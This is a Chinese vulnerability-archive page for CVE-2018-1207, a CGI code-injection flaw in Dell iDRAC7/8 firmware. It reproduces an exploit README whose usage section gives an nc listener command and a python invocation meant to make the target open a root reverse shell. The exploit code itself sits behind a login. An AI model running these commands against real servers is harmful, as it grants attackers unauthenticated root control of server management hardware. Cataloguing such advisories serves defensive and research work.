目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2018-1207 PoC — Dell EMC iDRAC7和iDRAC8 代码注入漏洞

来源
关联漏洞
标题: Dell EMC iDRAC7和iDRAC8 代码注入漏洞 (CVE-2018-1207)
Description:Dell EMC iDRAC7和iDRAC8都是美国戴尔(Dell)公司的包含硬件和软件的系统管理解决方案。该方案为Dell PowerEdge系统提供远程管理、崩溃系统恢复和电源控制等功能。 Dell EMC iDRAC7和iDRAC8 2.52.52.52之前版本中存在安全漏洞。远程攻击者可借助CGI变量利用该漏洞执行代码。
Description
Exploit iDRAC 7 & 8 firmware  <  2.52.52.52
介绍
# cve-2018-1207
Exploit iDRAC 7 &amp; 8 firmware  &lt;  2.52.52.52

## Description
Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code.

This code should cause the iDRAC service to open a reverse shell as the root user.

## Usage
Start your local listener:
nc -v -l -p local_port

`nc -v -l -p  5500`

Run the exploit:
python ./cve-2018-1207.py remote_host remote_port local_host local_port

`python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500`

## Requirements
You need to have a version of `sh4-linux-gnu-gcc` installed, which currently is `sh4-linux-gnu-gcc-11`

You can install it with `apt install gcc-11-sh4-linux-gnu`
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →